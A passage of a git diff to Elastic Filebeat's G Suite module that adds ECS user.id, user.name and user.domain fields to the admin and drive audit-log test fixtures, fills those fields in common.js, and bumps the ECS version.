"foo" }, { "event.action": "CHANGE_SESSION_LENGTH", @@ -1183,7 +1249,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNBLOCK_ON_DEVICE_ACCESS", @@ -1232,6 +1301,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json index 8847953dbf3d..6d7d3e377145 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-sites-test.json.log-expected.json @@ -50,7 +50,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_WEB_ADDRESS", @@ -103,7 +106,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SITES_SETTING", @@ -156,7 +162,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES", @@ -207,7 +216,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VIEW_SITE_DETAILS", @@ -255,6 +267,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json index b3be5557b035..832cbfc26b72 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-user-test.json.log-expected.json @@ -47,7 +47,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GENERATE_2SV_SCRATCH_CODES", @@ -97,7 +103,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_3LO_DEVICE_TOKENS", @@ -149,7 +161,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_3LO_TOKEN", @@ -200,7 +218,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_RECOVERY_EMAIL", @@ -250,7 +274,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_RECOVERY_PHONE", @@ -300,7 +330,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GRANT_ADMIN_PRIVILEGE", @@ -350,7 +386,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_ADMIN_PRIVILEGE", @@ -400,7 +442,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_ASP", @@ -451,7 +499,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TOGGLE_AUTOMATIC_CONTACT_SHARING", @@ -502,7 +556,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "BULK_UPLOAD", @@ -552,7 +612,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "BULK_UPLOAD_NOTIFICATION_SENT", @@ -603,7 +666,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CANCEL_USER_INVITE", @@ -654,7 +723,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_CUSTOM_FIELD", @@ -707,7 +782,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_EXTERNAL_ID", @@ -759,7 +840,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_GENDER", @@ -811,7 +898,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_IM", @@ -863,7 +956,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ENABLE_USER_IP_WHITELIST", @@ -915,7 +1014,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_KEYWORD", @@ -967,7 +1072,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_LANGUAGE", @@ -1019,7 +1130,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_LOCATION", @@ -1071,7 +1188,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_ORGANIZATION", @@ -1123,7 +1246,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_PHONE_NUMBER", @@ -1175,7 +1304,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_RECOVERY_EMAIL", @@ -1225,7 +1360,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_RECOVERY_PHONE", @@ -1275,7 +1416,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_RELATION", @@ -1327,7 +1474,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_USER_ADDRESS", @@ -1379,7 +1532,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_EMAIL_MONITOR", @@ -1437,7 +1596,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_DATA_TRANSFER_REQUEST", @@ -1489,7 +1654,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GRANT_DELEGATED_ADMIN_PRIVILEGES", @@ -1540,7 +1711,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_ACCOUNT_INFO_DUMP", @@ -1591,7 +1768,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_EMAIL_MONITOR", @@ -1642,7 +1825,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_MAILBOX_DUMP", @@ -1693,7 +1882,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_FIRST_NAME", @@ -1745,7 +1940,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "GMAIL_RESET_USER", @@ -1796,7 +1997,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_LAST_NAME", @@ -1848,7 +2055,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MAIL_ROUTING_DESTINATION_ADDED", @@ -1899,7 +2112,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MAIL_ROUTING_DESTINATION_REMOVED", @@ -1950,7 +2169,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_NICKNAME", @@ -2001,7 +2226,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REMOVE_NICKNAME", @@ -2052,7 +2283,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_PASSWORD", @@ -2102,7 +2339,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_PASSWORD_ON_NEXT_LOGIN", @@ -2154,7 +2397,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNLOAD_PENDING_INVITES_LIST", @@ -2201,7 +2450,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_RECOVERY_EMAIL", @@ -2251,7 +2503,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REMOVE_RECOVERY_PHONE", @@ -2301,7 +2559,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REQUEST_ACCOUNT_INFO", @@ -2351,7 +2615,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REQUEST_MAILBOX_DUMP", @@ -2407,7 +2677,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RESEND_USER_INVITE", @@ -2458,7 +2734,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RESET_SIGNIN_COOKIES", @@ -2508,7 +2790,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "SECURITY_KEY_REGISTERED_FOR_USER", @@ -2558,7 +2846,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "REVOKE_SECURITY_KEY", @@ -2608,7 +2902,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_INVITE", @@ -2659,7 +2959,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "VIEW_TEMP_PASSWORD", @@ -2710,7 +3016,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TURN_OFF_2_STEP_VERIFICATION", @@ -2760,7 +3072,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNBLOCK_USER_SESSION", @@ -2810,7 +3128,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNENROLL_USER_FROM_TITANIUM", @@ -2860,7 +3184,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ARCHIVE_USER", @@ -2910,7 +3240,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPDATE_BIRTHDATE", @@ -2961,7 +3297,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_USER", @@ -3011,7 +3353,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DELETE_USER", @@ -3061,7 +3409,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNGRADE_USER_FROM_GPLUS", @@ -3111,7 +3465,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", @@ -3161,7 +3521,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DOWNLOAD_USERLIST_CSV", @@ -3208,7 +3574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_USER_TO_ORG_UNIT", @@ -3260,7 +3629,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD", @@ -3311,7 +3686,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RENAME_USER", @@ -3362,7 +3743,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNENROLL_USER_FROM_STRONG_AUTH", @@ -3412,7 +3799,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "SUSPEND_USER", @@ -3462,7 +3855,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNARCHIVE_USER", @@ -3512,7 +3911,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNDELETE_USER", @@ -3562,7 +3967,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UNSUSPEND_USER", @@ -3612,7 +4023,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPGRADE_USER_TO_GPLUS", @@ -3662,7 +4079,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "USERS_BULK_UPLOAD", @@ -3711,7 +4134,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT", @@ -3761,6 +4187,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/config/common.js b/x-pack/filebeat/module/gsuite/config/common.js index 2867ee518f80..64ce7b0620f6 100644 --- a/x-pack/filebeat/module/gsuite/config/common.js +++ b/x-pack/filebeat/module/gsuite/config/common.js @@ -50,7 +50,10 @@ var gsuite = (function () { return; } + evt.Put("user.id", evt.Get("source.user.id")); + evt.Put("user.name", data[0]); evt.Put("source.user.name", data[0]); + evt.Put("user.domain", data[1]); evt.Put("source.user.domain", data[1]); }; diff --git a/x-pack/filebeat/module/gsuite/drive/config/config.yml b/x-pack/filebeat/module/gsuite/drive/config/config.yml index 1bbe63a6574a..80583ee31b6d 100644 --- a/x-pack/filebeat/module/gsuite/drive/config/config.yml +++ b/x-pack/filebeat/module/gsuite/drive/config/config.yml @@ -39,7 +39,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json index 77b16b9e929c..07868860ee6e 100644 --- a/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/drive/test/gsuite-drive-test.json.log-expected.json @@ -58,7 +58,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_canceled", @@ -119,7 +122,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_comment_added", @@ -180,7 +186,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_requested", @@ -241,7 +250,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "approval_reviewer_responded", @@ -302,7 +314,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "create", @@ -361,7 +376,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "delete", @@ -420,7 +438,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "download", @@ -479,7 +500,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "edit", @@ -538,7 +562,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "add_lock", @@ -597,7 +624,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "move", @@ -660,7 +690,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "preview", @@ -719,7 +752,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "print", @@ -778,7 +814,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_from_folder", @@ -839,7 +878,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "rename", @@ -900,7 +942,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "untrash", @@ -959,7 +1004,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "sheets_import_range", @@ -1018,7 +1066,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "trash", @@ -1077,7 +1128,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "remove_lock", @@ -1136,7 +1190,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "upload", @@ -1195,7 +1252,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "view", @@ -1255,7 +1315,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_acl_editors", @@ -1320,7 +1383,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_document_access_scope", @@ -1386,7 +1452,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_document_visibility", @@ -1452,7 +1521,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "shared_drive_membership_change", @@ -1518,7 +1590,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "shared_drive_settings_change", @@ -1584,7 +1659,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "sheets_import_range_access_change", @@ -1645,7 +1723,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "change_user_access", @@ -1712,6 +1793,9 @@ 